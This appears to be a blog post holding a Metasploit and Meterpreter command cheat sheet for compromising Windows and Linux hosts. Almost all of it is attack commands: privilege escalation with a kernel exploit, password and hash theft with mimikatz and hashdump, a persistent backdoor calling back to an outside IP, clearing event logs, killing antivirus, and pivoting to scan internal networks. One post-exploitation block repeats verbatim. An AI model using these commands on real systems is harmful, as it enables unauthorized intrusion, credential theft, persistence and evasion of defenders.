# service postgresql start
# msfdb init
# msfconsole
msf > db_status
Search appropriate modules (some examples):
msf > search platform:Windows
msf > search platform:"Windows 7"
msf > search name:mysql
msf > search path:scada
msf > search author:jsmith
msf > search cve:2010-0249
msf > search cve:2011 author:jsmith platform:linux
Exploitation Procedure:
search -> use -> show options -> set -> show payloads -> set payload -> run
Migrate the process within Meterpreter for a stable purpose(P.S.:Suppose the PID of davcdata.exe is 2732):
meterpreter > ps
...
2660 1456 w3wp.exe x86 0 NT AUTHORITY\NETWORK SERVICE c:\windows\system32\inetsrv\w3wp.exe
2732 604 davcdata.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\inetsrv\davcdata.exe
meterpreter > migrate 2732
[*] Migrating from 1980 to 2732...
[*] Migration completed successfully.
A simple trial for privilege escalation(P.S.: for Windows victims only):
meterpreter > getsystem
Find appropriate privilege escalation exploits(P.S.:Suppose the existing session is 1):
meterpreter > background
msf > search local_exploit
msf > use 0
msf > set session 1
msf > run
Privilege Escalation within Meterpreter(P.S.:Suppose MS10-015 vulnerability is applied and the existing session is 2):
meterpreter > cd %TEMP%
meterpreter > background
msf > use exploit/windows/local/ms10_015_kitrap0d
msf > set session 2
msf > set lhost 10.10.XX.XX
msf > run
msf > sessions -i 2
Retrieve passwords via Meterpreter:
meterpreter > load mimikatz
meterpreter > mimikatz_command -f sekurlsa::searchPassword
meterpreter > kerberos
Install a backdoor agent via Meterpreter for a persistent access:
meterpreter > run persistence -U -i 5 -p 443 -r 192.168.0.224
Among others, "-U" represents the automatic execution of the backdoor agent, "-i 5" stands for an attempt to connect the backdoor server every 5 seconds if the connection fails, "-p 443" defines TCP443 as the remote port listening on the backdoor server, and "-r 192.168.0.224" specifies the IP address of the backdoor server, which is 192.168.0.224 in this case.
meterpreter > clearev
Post-exploitation commands(for Windows):
meterpreter > sysinfo
meterpreter > getuid
meterpreter > run post/windows/manage/migrate NAME=explorer.exe
meterpreter > run post/windows/manage/killav
meterpreter > run post/windows/gather/checkvm
meterpreter > run post/windows/manage/autoroute
meterpreter > run post/windows/gather/enum_applications
meterpreter > run post/windows/gather/enum_ie
meterpreter > run post/windows/gather/hashdump
meterpreter > run post/windows/gather/enum_logged_on_users
meterpreter > run post/windows/gather/credentials/credentials_collector
meterpreter > run post/windows/gather/screen_spy
meterpreter > run post/windows/gather/enum_domain
meterpreter > run post/windows/gather/win_privs
meterpreter > run post/windows/gather/usb_history
meterpreter > run post/multi/recon/local_exploit_suggester
Post-exploitation commands(for Linux):
meterpreter > sysinfo
meterpreter > run post/linux/gather/enum_configs
meterpreter > run post/linux/gather/enum_system
meterpreter > run post/linux/gather/enum_users_history
meterpreter > run post/multi/recon/local_exploit_suggester
AutoRun Post-exploitation commands:
1) Save the commands above into a rc file located at /root/autorun.rc
2) Enter the handler view, specify the corresponding options, and execute the following command:
msf handler > set AutoRunScript multi_console_command -rc /root/autorun.rc
msf handler > run
meterpreter > run post/windows/gather/enum_ie
meterpreter > run post/windows/gather/hashdump
meterpreter > run post/windows/gather/enum_logged_on_users
meterpreter > run post/windows/gather/credentials/credentials_collector
meterpreter > run post/windows/gather/screen_spy
meterpreter > run post/windows/gather/enum_domain
meterpreter > run post/windows/gather/win_privs
meterpreter > run post/windows/gather/usb_history
meterpreter > run post/multi/recon/local_exploit_suggester
Post-exploitation commands(for Linux):
meterpreter > sysinfo
meterpreter > run post/linux/gather/enum_configs
meterpreter > run post/linux/gather/enum_system
meterpreter > run post/linux/gather/enum_users_history
meterpreter > run post/multi/recon/local_exploit_suggester
AutoRun Post-exploitation commands:
1) Save the commands above into a rc file located at /root/autorun.rc
2) Enter the handler view, specify the corresponding options, and execute the following command:
msf handler > set AutoRunScript multi_console_command -rc /root/autorun.rc
msf handler > run
Post-exploitation for further exploration:
1) ARP Scan (PS: suppose the target network is 10.32.120.0/24):
meterpreter > run arp_scanner -r 10.32.120.0/24
2) Make the compromised PC as a router/jumpbox (PS: suppose the target network is 192.168.2.0/24, and the meterpreter session id is 1):
meterpreter > background
msf > route add 192.168.2.0 255.255.255.0 1
The updated routing table can be confirmed by executing the following command:
msf > route print
The target network can be scanned through the jumpbox now by executing the commands below:
msf > use auxiliary/scanner/portscan/tcp
msf > set RHOSTS 192.168.2.1
msf > set PORTS 1-1024
msf > run
No comments:
Post a Comment